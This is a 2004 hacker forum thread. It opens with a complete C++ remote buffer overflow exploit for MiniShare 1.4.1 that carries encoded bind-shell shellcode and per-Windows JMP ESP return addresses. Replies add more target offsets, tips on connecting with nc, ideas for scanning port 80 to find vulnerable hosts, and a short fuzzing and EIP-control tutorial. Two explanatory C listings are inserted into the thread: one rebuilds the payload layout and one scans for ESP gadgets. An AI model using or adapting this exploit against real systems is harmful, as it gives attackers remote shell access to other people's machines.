Vendors are now contacted 2 hours before you, and so are some security sites. Enjoy my discovery, members, and check my website again if needed.
CODE
/*
MiniShare <= 1.4.1, Remote Buffer Overflow Exploit v0.1. Binds a shellcode to port 101.
Full disclosure and exploit by class101 [at] DFind.kd-team.com [&] #n3ws [at] EFnet, 07 November 2004
Thanx to HDMoore and Metasploit.com for their kickass ASM work.

------------------ WHAT IS MINISHARE ------------------
Homepage - http://minishare.sourceforge.net/
MiniShare is meant to serve anyone who has the need to share files to anyone, doesn't have a place to store the files on the web, and does not want or simply does not have the skill and possibility to set up and maintain a complete HTTP-server software...

-------------- VULNERABILITY --------------
A simple buffer overflow in the link length, nothing more; read the code for further instructions.

---- FIX ----
Actually none; the vendor is contacted the same day this is published, 1 hour before you. A nice (filtered) greeting to NGSS, iDEFENSE and all the other private-disclosure homo crews, as well as K-OTiK, who jerk off in their "Lab" lol :->

---- EXTRA ----
Update the JMP ESP if you need to. A wrong offset will crash MiniShare.
Code tested working on MiniShare 1.4.1 and WinXP SP1 English, Win2k SP4 English, WinNT SP6 English. Other MiniShare versions aren't tested.
Tip: if it crashes for you, try playing with Sleep()...

---- BY ----
class101 [at] DFind.kd-team.com [&] #n3ws [at] EFnet, who greets DiabloHorn [at] www.kd-team.com [&] #kd-team [at] EFnet
*/
#include <winsock2.h>
#include <windows.h>
#include <iostream>
#include <cstdlib>
#include <cstring>
#pragma comment(lib, "ws2_32")
using namespace std;

//380 bytes, BIND shellcode port 101, XORed 0x88, thanx HDMoore.
char scode[] =
"\xEB"
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
"\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D"
"\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9"
"\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
"\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89"
"\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03"
"\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F"
"\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88"
"\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61"
"\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9"
"\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C"
"\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
"\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68"
"\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F"
"\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23"
"\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89"
"\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
"\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77"
"\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77"
"\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77"
"\x58\x68\x61\x63\x6B\x90";

/*
//116 bytes, execute regedit.exe, XORed 0x88, hardcoded WinXP SP1 English
char scode_regedit[] =
"\xEB"
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
"\xFF\xDD\x01\x6D\x09\x64\xC4\x88\x88\x88\xDB\x05\xF5\x3C\x4E\xCD\x7C\xFA\x4E\xCD"
"\x7D\xED\x4E\xCD\x7E\xEF\x4E\xCD\x7F\xED\x4E\xCD\x70\xEC\x4E\xCD\x71\xE1\x4E\xCD"
"\x72\xFC\x4E\xCD\x73\xA6\x4E\xCD\x74\xED\x4E\xCD\x75\xF0\x4E\xCD\x76\xED\x4E\xCD"
"\x77\x88\xE0\x8D\x88\x88\x88\x05\xCD\x7C\xD8\x30\xE8\x75\x6E\xFF\x77\x58\xE0\x89"
"\x88\x88\x88\x30\xEB\x10\x6F\xFF\x77\x58\x68\x61\x63\x6B\x90";

//565 bytes, execute regedit.exe, alphanumeric, hardcoded WinXP SP1 English
char scode_regedit_alpha[] =
"LLLLYhbSgCX5bSgCHQVPPTQPPaRVVUSBRDJfh2ADTY09VQa0tkafhXMfXf1Dkbf1TkbjgY0Lkd0TkdfhH"
"CfYf1LkfjiY0Lkh0tkjjOX0Dkkf1TkljxY0Lko0Tko0TkqjfY0Lks0tks0Tkuj1Y0Lkw0tkw0tkyCjyY0"
"Lkz0TkzCC0tkzCCjmY0Lkz0TkzCC0TkzCCjhX0Dkz0tkzCC0tkzCCjPX0Dkz0TkzCC0tkzCCjfY0Lkz0T"
"kzCjjX0DkzC0TkzCCjeX0Dkz0tkzCC0TkzCCjvX0Dkz0tkzCC0TkzCCj3X0Dkz0tkzCC0tkzCCjOX0Dkz"
"0tkzCjaX0DkzCChuucTX1DkzCCCC0tkzCCjaY0Lkz0TkzCC0tkzCjRY0LkzCfhNUfXf1Dkzf1TkzCCCfh"
"hhfYf1Lkzf1TkzCCChS4ciX1DkzCCCC0TkzCC0tkzCjKY0Lkz0TkzCCfhzhfXf1Dkzf1TkzUvB3tLHCiS"
"r2K9Esr9Ele9E8g9Eqe9Ejd9Eni9EUt9EbD9Efe9Etx9E2e9EOahpucTrEjPG2LLwhGhR4ciGcgSwzG";
*/

static char payload[5000];

// Per-target return addresses (little-endian), each a JMP ESP in a system DLL.
char espxp1en[]="\x33\x55\xdc\x77"; //JMP ESP - user32.dll - WinXP SP1 English
char esp2k4en[]="\xb8\x9e\xe3\x77"; //JMP ESP - user32.dll - Win2k SP4 English
char espnt6en[]="\xf8\x29\xf3\x77"; //JMP ESP - kernel32.dll - WinNT SP6 English

void usage(char* us);
void ver();
WSADATA wsadata;

int main(int argc, char *argv[])
{
    ver();
    if ((argc<3)||(argc>4)||(atoi(argv[1])<1)||(atoi(argv[1])>3)){usage(argv[0]);return -1;}
    if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){cout<<"[+] wsastartup error: "<<WSAGetLastError()<<endl;return -1;}
    int port, sizeA, sizeB, sizeC, a, b, c;
    const char *target=NULL, *os=NULL;
    if (argc==4){port=atoi(argv[3]);} else port=80;
    if (atoi(argv[1]) == 1){target=espxp1en;os="WinXP SP1 English";}
    if (atoi(argv[1]) == 2){target=esp2k4en;os="Win2k SP4 English";}
    if (atoi(argv[1]) == 3){target=espnt6en;os="WinNT SP6 English";}
    SOCKET s;
    fd_set mask;
    struct timeval timeout;
    struct sockaddr_in server;
    s=socket(AF_INET,SOCK_STREAM,0);
    if (s==INVALID_SOCKET){cout<<"[+] socket() error: "<<WSAGetLastError()<<endl;WSACleanup();return -1;}
    cout<<"[+] target: "<<os<<endl;
    server.sin_family=AF_INET;
    server.sin_addr.s_addr=inet_addr(argv[2]);
    server.sin_port=htons(port);
    WSAConnect(s,(struct sockaddr *)&server,sizeof(server),NULL,NULL,NULL,NULL);
    timeout.tv_sec=3;timeout.tv_usec=0;
    FD_ZERO(&mask);FD_SET(s,&mask);
    switch(select((int)(s+1),NULL,&mask,NULL,&timeout))
    {
    case -1:
        cout<<"[+] select() error: "<<WSAGetLastError()<<endl;closesocket(s);WSACleanup();return -1;
    case 0:
        cout<<"[+] connection failed."<<endl;closesocket(s);WSACleanup();return -1;
    default:
        if(FD_ISSET(s,&mask))
        {
            cout<<"[+] connected, constructing the payload..."<<endl;
            Sleep(1000);
            sizeA=1787;                 // filler up to the saved return address
            sizeB=414-sizeof(scode);    // 'A' slide between the JMP ESP and the shellcode
            sizeC=10;                   // trailing filler
            memset(payload,0,sizeof(payload));
            strcat(payload,"GET ");
            for (a=0;a<sizeA;a++){strcat(payload,"\x41");}
            strcat(payload,target);     // JMP ESP address lands on EIP
            for (b=0;b<sizeB;b++){strcat(payload,"\x41");}
            strcat(payload,scode);
            for (c=0;c<sizeC;c++){strcat(payload,"\x41");}
            strcat(payload," HTTP/1.1\r\n\r\n");
            Sleep(1000);
            if (send(s,payload,(int)strlen(payload),0)==SOCKET_ERROR)
            {
                cout<<"[+] sending error, the server prolly rebooted."<<endl;
                closesocket(s);WSACleanup();return -1;
            }
            Sleep(1000);
            cout<<"[+] size of payload: "<<strlen(payload)<<endl;
            cout<<"[+] payload sent, connect to port 101 to get a shell."<<endl;
        }
    }
    closesocket(s);
    WSACleanup();
    return 0;
}

void usage(char* us)
{
    cout<<"USAGE: 101_mini.exe Target Ip Port\n"<<endl;
    cout<<"TARGETS: "<<endl;
    cout<<" [+] 1. WinXP SP1 English (*)"<<endl;
    cout<<" [+] 2. Win2k SP4 English (*)"<<endl;
    cout<<" [+] 3. WinNT SP6 English (*)"<<endl;
    cout<<"NOTE: "<<endl;
    cout<<" Port 80 is the default if no port is specified"<<endl;
    cout<<" The exploit binds a shellcode to port 101"<<endl;
    cout<<" A wildcard (*) means Tested."<<endl;
    return;
}

void ver()
{
    cout<<endl;
    cout<<" "<<endl;
    cout<<" ===================================================[v0.1]===="<<endl;
    cout<<" ====MiniShare, Minimal HTTP Server for Windows <= v1.4.1====="<<endl;
    cout<<" =============Remote Buffer Overflow Exploit=================="<<endl;
    cout<<" ====coded by class101===========[DFind.kd-team.com 2004]====="<<endl;
    cout<<" ============================================================="<<endl;
    cout<<" "<<endl;
}
bye
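The request layout the exploit above builds (1787 filler bytes, the 4-byte JMP ESP address, an 'A' slide, the shellcode, 10 trailing bytes, then the HTTP tail), as an added stand-alone C example that is not code from the original post. It assumes a 4096-byte output buffer and uses a constructed 380-byte block of 0xCC bytes in place of a real payload, so the layout can be built and checked offline without touching a server. The XP SP1 English address is the one from the post. One caveat the original's strcat-based builder has: a return address containing 0x00 is silently truncated, so the builder here refuses such an address outright.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Layout constants copied from the exploit: "GET " + 1787 'A's, the 4-byte
 * return address, a 414-byte window holding the 'A' slide plus the shellcode
 * and its NUL, 10 more 'A's, then the HTTP tail. */
#define PAD_BEFORE_RET 1787
#define SLED_WINDOW    414
#define PAD_AFTER      10
#define REQ_HEAD       "GET "
#define REQ_TAIL       " HTTP/1.1\r\n\r\n"

/* Offset inside the request at which the saved return address sits. */
size_t ret_offset(void) { return strlen(REQ_HEAD) + PAD_BEFORE_RET; }

/* A NUL inside the address would end the strcat'd C string early. */
int ret_has_nul(const unsigned char ret[4])
{
    for (int i = 0; i < 4; i++)
        if (ret[i] == 0x00) return 1;
    return 0;
}

/* Build the request into out. Returns its length, or 0 when the return
 * address is unusable, the shellcode does not fit the window, or out is
 * too small. ret is the little-endian JMP ESP address for the target. */
size_t build_minishare_request(unsigned char *out, size_t cap,
                               const unsigned char ret[4],
                               const unsigned char *sc, size_t sclen)
{
    if (ret_has_nul(ret) || sclen + 1 > SLED_WINDOW) return 0;
    /* The exploit sizes the sled as 414 - sizeof(scode); sizeof counts the
     * terminating NUL, hence the +1. */
    size_t sled  = SLED_WINDOW - (sclen + 1);
    size_t total = strlen(REQ_HEAD) + PAD_BEFORE_RET + 4 + sled + sclen
                 + PAD_AFTER + strlen(REQ_TAIL);
    if (total + 1 > cap) return 0;

    unsigned char *p = out;
    memcpy(p, REQ_HEAD, strlen(REQ_HEAD)); p += strlen(REQ_HEAD);
    memset(p, 'A', PAD_BEFORE_RET);        p += PAD_BEFORE_RET;
    memcpy(p, ret, 4);                     p += 4;     /* overwrites saved EIP */
    memset(p, 'A', sled);                  p += sled;  /* 0x41 = inc ecx, harmless slide */
    memcpy(p, sc, sclen);                  p += sclen;
    memset(p, 'A', PAD_AFTER);             p += PAD_AFTER;
    memcpy(p, REQ_TAIL, strlen(REQ_TAIL)); p += strlen(REQ_TAIL);
    *p = 0;
    return (size_t)(p - out);
}

/* Sanity check on a built request: the return address sits at ret_offset()
 * and the shellcode directly follows the slide, so JMP ESP runs into it. */
int request_layout_ok(const unsigned char *req, size_t len,
                      const unsigned char ret[4],
                      const unsigned char *sc, size_t sclen)
{
    size_t r = ret_offset(), sled = SLED_WINDOW - (sclen + 1);
    if (len < r + 4 + sled + sclen + PAD_AFTER + strlen(REQ_TAIL)) return 0;
    if (memcmp(req + r, ret, 4) != 0) return 0;
    if (memcmp(req + r + 4 + sled, sc, sclen) != 0) return 0;
    return memcmp(req + len - strlen(REQ_TAIL), REQ_TAIL, strlen(REQ_TAIL)) == 0;
}

/* Demo: the WinXP SP1 English JMP ESP from the post with a constructed
 * 380-byte stand-in shellcode (0xCC int3 bytes, not a real payload).
 * Returns the request length when the layout checks pass, 0 otherwise. */
size_t demo_build(void)
{
    static unsigned char req[4096];
    static const unsigned char ret_xp_sp1_en[4] = { 0x33, 0x55, 0xdc, 0x77 };
    unsigned char sc[380];
    memset(sc, 0xCC, sizeof sc);
    size_t len = build_minishare_request(req, sizeof req, ret_xp_sp1_en, sc, sizeof sc);
    if (!len || !request_layout_ok(req, len, ret_xp_sp1_en, sc, sizeof sc)) return 0;
    return len;
}

int main(void)
{
    printf("return address at offset %zu, request length %zu\n",
           ret_offset(), demo_build());
    return 0;
}
```

Whatever the shellcode length, the request is always 2231 bytes, because the slide shrinks as the shellcode grows; what changes per target is only the 4 bytes at offset 1791.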
Anarchiste
Nov 7 2004, 02:34 PM
I have only one thing to say: hats off to the artist! Honestly, respect for your work; few people contribute as much to the board, and I'm not saying that to kiss your ass, I'm saying it precisely because we lack active people like you... keep it up, and I promise I won't "recode" this one.
QUOTE(Anarchiste @ Nov 7 2004, 02:34 PM) I have only one thing to say: hats off to the artist! Honestly, respect for your work; few people contribute as much to the board, and I'm not saying that to kiss your ass, I'm saying it precisely because we lack active people like you... keep it up, and I promise I won't "recode" this one.
You can of course recode it, I don't care, but don't say "coded by you" without mentioning the original coder, as the other day, or at least say that you modded it, etc.; there is no need to say more than you did. Or, if you really want to say "coded by you", erase everything in the code, grab your debugger and code your own.
michael
Nov 7 2004, 02:41 PM
QUOTE payload send, connect the port 101 to get a shell
How, or with what, should I connect to port 101? Good job on the coding m8
cyrixx
Nov 7 2004, 02:57 PM
tzzzz, try nc guy
[eXPhase
Nov 7 2004, 03:49 PM
Nice exploit again. Works here on WinXP EN SP1.
Not gonna try this one on other boxes, since the default port is 80 and you have to scan for ages before you can test it.
Nikscap
Nov 7 2004, 03:59 PM
Thx for your work man, I am going to: http://dfind.kd-team.com/36/55/op.php
bye
tuttefrut
Nov 7 2004, 04:28 PM
very nice work 101 will test it right away
Killahbee
Nov 7 2004, 04:58 PM
QUOTE([eXPhase @ Nov 7 2004, 03:49 PM) Nice exploit again. Works here on WinXP EN SP1. Not gonna try this one on other boxes, since the default port is 80 and you have to scan for ages before you can test it.
Maybe a banner scan will help you.
brOmstar
Nov 7 2004, 05:04 PM
thx 101 nice code
here is the jmp esp for xp sp2 german
char espxp2de[]="\x0a\xaf\xd5\x77"; //JMP ESP - user32.dll - WinXP SP2 German
I will add other German offsets soon when I'm back on my workstation... have fun
QUOTE(brOmstar @ Nov 7 2004, 05:04 PM) thx 101 nice code here is the jmp esp for xp sp2 german char espxp2de[]="\x0a\xaf\xd5\x77"; //JMP ESP - user32.dll - WinXP SP2 German I will add other German offsets soon when I'm back on my workstation... have fun
Thanx, I'll update my code with your help, guys.
mortello
Nov 7 2004, 06:39 PM
Crashes Mini on my XP SP1 French....
If you could tell me how to get you the jmp esp.... I would.
[eXPhase
Nov 7 2004, 07:01 PM
QUOTE(Killahbee @ Nov 7 2004, 04:58 PM) QUOTE([eXPhase @ Nov 7 2004, 03:49 PM) Nice exploit again. Works here on WinXP EN SP1. Not gonna try this one on other boxes, since the default port is 80 and you have to scan for ages before you can test it. Maybe a banner scan will help you.
I couldn't find any Shixxnote a few weeks back either, and that was on port 2000. But you get tons of results on 80. And I know the banner, but it is so much work for that single shell I want to see. Nah, I believe 101 that it works on other versions too.
mortello
Nov 7 2004, 07:16 PM
QUOTE([eXPhase @ Nov 7 2004, 07:01 PM) QUOTE(Killahbee @ Nov 7 2004, 04:58 PM) QUOTE([eXPhase @ Nov 7 2004, 03:49 PM) Nice exploit again. Works here on WinXP EN SP1. Not gonna try this one on other boxes, since the default port is 80 and you have to scan for ages before you can test it. Maybe a banner scan will help you. I couldn't find any Shixxnote a few weeks back either, and that was on port 2000. But you get tons of results on 80. And I know the banner, but it is so much work for that single shell I want to see. Nah, I believe 101 that it works on other versions too.
I checked the banner.... and it doesn't help you, since it is this:
Microsoft Windows XP [version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.

C:\*********>sl.exe -bht 888 192.168.1.101
ScanLine 1.01 Copyright © Foundstone, Inc. 2002
http://www.foundstone.com
Scan of 1 IP started at Sun Nov 07 14:14:57 2004
-------------------------------------------------------------------------------
192.168.1.101
Responded in 0 ms. 0 hops away
Responds with ICMP unreachable: No
TCP ports: 888
-------------------------------------------------------------------------------
Scan finished at Sun Nov 07 14:15:01 2004
1 IP and 1 port scanned in 0 hours 0 mins 4.00 secs

BTW, I made it run on port 888, so that's why it's that port that I scanned with sl.exe.
Paul
Nov 7 2004, 07:30 PM
CODE
D:\>d:\forum\sl\sl -bhpt 80 localhost
ScanLine (TM) 1.01 Copyright (c) Foundstone, Inc. 2002
http://www.foundstone.com
Scan of 1 IP started at Sun Nov 07 20:27:42 2004
-------------------------------------------------------------------------------
127.0.0.1
Responds with ICMP unreachable: No
TCP ports: 80
TCP 80: [HTTP/1.1 200 OK Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>]
-------------------------------------------------------------------------------
Scan finished at Sun Nov 07 20:27:42 2004
1 IP and 1 port scanned in 0 hours 0 mins 0.04 secs

Thanx for sharing it with us, 101.
The banner you can probably get if you send a string, no?
Try sending stuff like HEAD / HTTP/1.1, HEAD /, etc.; maybe you will notice something.
ShouiZen
Nov 7 2004, 11:22 PM
Man, you do an excellent job!! To be continued...
slb33
Nov 8 2004, 06:33 AM
Crashed on my Windows XP SP1!
Guess I need to play around with the Sleep() in this exploit.
I'll let you know if I figure it out
Error-404
Nov 8 2004, 01:58 PM
nice work m8
but 1 question: which port must I scan?
Error-404
B3T4
Nov 8 2004, 03:01 PM
When I do "findjump user32.dll esp" I get a whole list of jmps and calls; which one do I need to use, or is it trial and error?
QUOTE(Error-404 @ Nov 8 2004, 01:58 PM) nice work m8 but 1 question: which port must I scan? Error-404
Definitely NOT the HTTP port.
z0mbi3
Nov 8 2004, 04:35 PM
Something you can add to it: WinXP SP2 English
CODE char espxp2en[]="\x40\x27\xdf\x77"; //0x77DF2740 - advapi32.dll jmp esp
Tried it, works great. See ya
brOmstar
Nov 8 2004, 05:13 PM
@B3T4 any jmp esp should do it
Error-404
Nov 8 2004, 05:51 PM
thx for the info. Has someone hacked a server with this exploit?
brOmstar
Nov 8 2004, 05:54 PM
No, we aren't hackers... we only like to research.
GamezDoG
Nov 8 2004, 06:33 PM
Thnx for sharing this exploit mate!!
Does somebody know a good banner scanner for this exploit?? Because there are a lot of ports 80 open!!
Thnx
da_cash
Nov 8 2004, 08:29 PM
Tested to work on WinXP SP2 Polish:
char espxp2pl[]="\x6e\xe2\xd4\x77"; //JMP ESP - user32.dll - WinXP SP2 Polish
Thx goes 4 DiabloHorn 4 posting the great tool called findjump.
So if someone knows the method to get the universal jmp, if there is one, thx to tell me how to find it. thanx
brOmstar
Nov 8 2004, 10:17 PM
What exactly is a universal jmp call... does it mean that this jmp esp is the same on every system, in the same dll @ the same address??
Yes bromstar, a universal jmp address will work on every Windows, as in many previous exploits; take the rpc1 for example: when HDMoore released it (you can search on packetstormsecurity for my modded exploit), I added a lot of offsets, but about 1 week later it was useless because the universal offset was found.
I haven't got papers on how to find this; I don't care whether there is a magic offset to find for MiniShare, but anyway I'd like to learn this method. If someone knows something about this or has a good paper about it, thanx for posting it.
brOmstar
Nov 8 2004, 10:41 PM
I know universal opcodes, but not whether it is of the kind I described (cause then a tool must check every osversion/lang/sp to detect that.. I think; should be impossible). I read something about msfpescan at metasploit.org. Taken from http://www.metasploit.org/confs/blackhat2004/defcon.pdf:
--------------------------------------------------------
Msfpescan - Return Address Fun
Scans PE images for data (DLL, EXE)
Finds universal return addresses
Easy to script, easy to parse output
Regular expression match support
Can automatically disassemble code
msfpescan found good returns
DCOM - NT SP6 -> XP SP1
Serv-U - All versions NT->2K3
LSASS - Autodetect Universal
Blackice - Mad Bruteforce Foo
-----------------------------------------------------------
So that should be a way to detect universal offsets. Some more info, taken from http://www.securityfocus.com/infocus/1800:
----------------------------------------------------------------
3.1 Utilities
The new utilities are really just the icing on the cake, and their importance is only fully evident once the tools are utilized. Msfpescan can be used to analyze and disassemble executables and DLLs, which helps to find the correct offsets and addresses during the stage of exploitation and privilege escalation. It can search for jmp statements or for a sequence like pop-pop-ret, and the utility even supports regular expressions. This can be used to find effective return addresses from Windows expressions, and thus can be used to add new targets to the exploit.
The various command line flags are as shown below,
Usage: /home/framework-2.2/msfpescan <input> <mode> <options>
Inputs:
-f <file> Read in PE file
-d <dir> Process memdump output
Modes:
-j <reg> Search for jump equivalent instructions
-s Search for pop+pop+ret combinations
-x <regex> Search for regex match
-a <address> Show code at specified virtual address
Options:
-A <count> Number of bytes to show after match
-B <count> Number of bytes to show before match
-I address Specify an alternate ImageBase
-n Print disassembly of matched data
---------------------------------------------------------------------------------------
But I don't understand how to find the universal offset with that tool (at the moment). Could it be that the jmp is in a dll that is loaded and shipped with the exploited software and is the same for every os/lang/ver??
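What findjump and msfpescan do when they list JMP ESP candidates, as an added C example that is mine and not the forum's tool or Metasploit's code: scan a code image for the opcode sequences that transfer control to ESP (FF E4 jmp esp, FF D4 call esp, 54 C3 push esp / ret), report each as a virtual address for an assumed image base, flag bytes that cannot be sent (0x00 is fatal with the strcat builder in the exploit above; which other bytes matter depends on the server's parser, and the thread reports 0x77D5AF0A, which contains 0x0a, working), and print the address in the "\x0a\xaf\xd5\x77" form the target table uses. The image bytes are constructed for the demo, not taken from any real DLL; scanning a DLL on disk additionally needs the PE section table to turn file offsets into RVAs, which is what the real tools do. The addresses differ per OS, service pack and language because the system DLL builds differ, hence one entry per target in the exploit; a "universal" one is simply an address that is identical in all of them.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Opcode sequences that transfer control to ESP on x86. */
typedef struct { const unsigned char *bytes; size_t len; const char *name; } gadget_t;
static const gadget_t gadgets[] = {
    { (const unsigned char *)"\xff\xe4", 2, "jmp esp" },
    { (const unsigned char *)"\xff\xd4", 2, "call esp" },
    { (const unsigned char *)"\x54\xc3", 2, "push esp; ret" },
};

/* Scan an image assumed mapped at base for the gadgets above. Writes up
 * to max virtual addresses into out; returns how many were found in total. */
size_t find_esp_gadgets(const unsigned char *img, size_t len, uint32_t base,
                        uint32_t *out, size_t max)
{
    size_t found = 0;
    for (size_t off = 0; off + 1 < len; off++) {
        for (size_t g = 0; g < sizeof gadgets / sizeof gadgets[0]; g++) {
            if (off + gadgets[g].len <= len &&
                memcmp(img + off, gadgets[g].bytes, gadgets[g].len) == 0) {
                if (found < max) out[found] = base + (uint32_t)off;
                found++;
                break;
            }
        }
    }
    return found;
}

/* True if any byte of the little-endian address equals b. */
int addr_has_byte(uint32_t a, unsigned char b)
{
    for (int i = 0; i < 4; i++)
        if (((a >> (8 * i)) & 0xff) == b) return 1;
    return 0;
}

/* Render the address as the escaped little-endian C literal used in the
 * exploit's target table, e.g. 0x77d5af0a -> \x0a\xaf\xd5\x77. */
const char *addr_to_c_literal(uint32_t a)
{
    static char buf[24];
    snprintf(buf, sizeof buf, "\\x%02x\\x%02x\\x%02x\\x%02x",
             (unsigned)(a & 0xff), (unsigned)((a >> 8) & 0xff),
             (unsigned)((a >> 16) & 0xff), (unsigned)((a >> 24) & 0xff));
    return buf;
}

/* Constructed stand-in for a code section (not bytes from any real DLL),
 * assumed mapped at DEMO_BASE. */
static const unsigned char demo_img[] = {
    0x90, 0x90, 0xff, 0xe4, 0x00,   /* nop nop | jmp esp        @ +2 */
    0x54, 0xc3, 0x90,               /* push esp; ret | nop      @ +5 */
    0xff, 0xd4,                     /* call esp                 @ +8 */
    0x0a, 0x00,
};
#define DEMO_BASE 0x77d40000u

size_t demo_count(void)
{
    return find_esp_gadgets(demo_img, sizeof demo_img, DEMO_BASE, NULL, 0);
}

/* i-th hit in the demo image, or 0 when there is no such hit. */
uint32_t demo_gadget(size_t i)
{
    uint32_t hits[8];
    size_t n = find_esp_gadgets(demo_img, sizeof demo_img, DEMO_BASE, hits, 8);
    return (i < n && i < 8) ? hits[i] : 0;
}

int main(void)
{
    uint32_t hits[8];
    size_t n = find_esp_gadgets(demo_img, sizeof demo_img, DEMO_BASE, hits, 8);
    for (size_t i = 0; i < n && i < 8; i++)
        printf("0x%08x  %s%s\n", hits[i], addr_to_c_literal(hits[i]),
               addr_has_byte(hits[i], 0x00) ? "  (contains 0x00, unusable)" : "");
    return 0;
}
```

Of the three hits in the demo image, the first (0x77d40002) contains a 0x00 byte and would be truncated by strcat, which is exactly why a listing full of candidates still needs filtering before one goes into the target table.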
Thanx man, I will read this.
Deadhat
Nov 9 2004, 11:40 AM
where do i get findjump?
ConfigSys
Nov 9 2004, 12:33 PM
Tested & worked on WinXP SP1 (English). Professional work 101.
Simple hint: because the exploit works with port 80, it means we can browse to the victim IP and then see if we've got a MiniShare server.
ZoraX
Nov 9 2004, 01:28 PM
nice sploit :D Just tested locally and it worked 100%. Keep the good work up :)
alzeimeur
Nov 9 2004, 01:53 PM
Nice Xploit, tested locally, works perfectly. But I have a question: is there a scanner for this Xploit? thx al'
Thanx all for the nice answers. I found another hole in a small ftp server; check my website, I'm releasing it soon, time to advise its coder atm. l8r
GamezDoG
Nov 9 2004, 04:11 PM
Is there some scanner for this exploit?? Because there are a lot of ports 80??
paskaluis
Nov 9 2004, 07:36 PM
101, thx for the code. What program do I need to use to debug (jump addy) to add different offsets?
da_cash
Nov 9 2004, 08:43 PM
For all people interested, here's the tool used for finding offsets in your versions..
ps.. class101, could you create a tutorial about win buffer overflows / how you find them and what tools you use... it may help us gain some more knowledge.
I debug a small app and simply send various strings to it, and boom! I don't use code to find them, just a lot of time...
mortello
Nov 10 2004, 02:36 AM
QUOTE(101 @ Nov 9 2004, 10:47 PM) I debug a small app and simply send various strings to it, and boom! I don't use code to find them, just a lot of time...
Care to explain how you "debug" an ftp server/web server or else... maybe that could help us (members here) to find some bugs also....
brOmstar
Nov 10 2004, 10:10 AM
run it in a debugger and simple send arguments...
agathos
Nov 11 2004, 03:04 PM
Yeah, a good debugger is WinDBG (running like gdb under Linux), or OllyDBG, or SoftICE.
ShouiZen
Nov 11 2004, 07:29 PM
char espxp2fr[]="\x0A\xAF\xD5\x77"; //0x77D5AF0A - user32.dll jmp esp WIN XP SP2 French;
It works fine (I tested). 101, you should do a tutorial for all governmentsecurity members, thanks.
DHS`
Nov 11 2004, 09:56 PM
Indeed @ only port 80, & the banner doesn't help.
DiabloPatch
Nov 12 2004, 01:23 AM
Well, nice exploits, but it would also be nice to tell them how you learn such things. Knowledge should be for everyone. So just a very tiny quick intro to this (since there are numerous posts on this board covering this subject). Finding exploits is also referred to as fuzzing, which means sending random-length strings to a port where a service runs to see if it crashes or something odd happens. This is the easy definition, to find the normal overflows; there are more powerful fuzzing techniques to find other kinds of exploits. After finding an "exploit", at this stage rather called a bug, you fire up your debugger (SoftICE or OllyDbg) and start to mess around with it. The easiest explanation would be: try to get "control of EIP", meaning that you know exactly how many bytes to send before you start overwriting the value of EIP. At the stage where you control EIP, all you need to do is find out where your "payload" is and how to get there. So just find an opcode to overwrite EIP with, so that EIP points to your "payload", and then you have manually created a working exploit. After some testing etc. you can just make a little C/perl program to do it all automatically. This was a very short explanation of how it's done in a very basic way. For more references, here are some papers.
- Very nice challenges http://community.core-sdi.com/~gera/InsecureProgramming/
- Alphanumeric Shellcode http://www.phrack.org/show.php?p=57&a=15
- Smashing the stack for fun and profit http://www.insecure.org/stf/smashstack.txt
- EliteHaven, nice site with shellcode and information http://www.elitehaven.net/index2.htm
- MetaSploit for shellcodes and engines http://www.metasploit.com/shellcode.html
- Very nice BoF for beginners http://www.infosecwriters.com/texts.php?op=display&id=134
- Non-technical talk about shellcode generation http://www.coresecurity.com/files/files/51...eGeneration.pdf
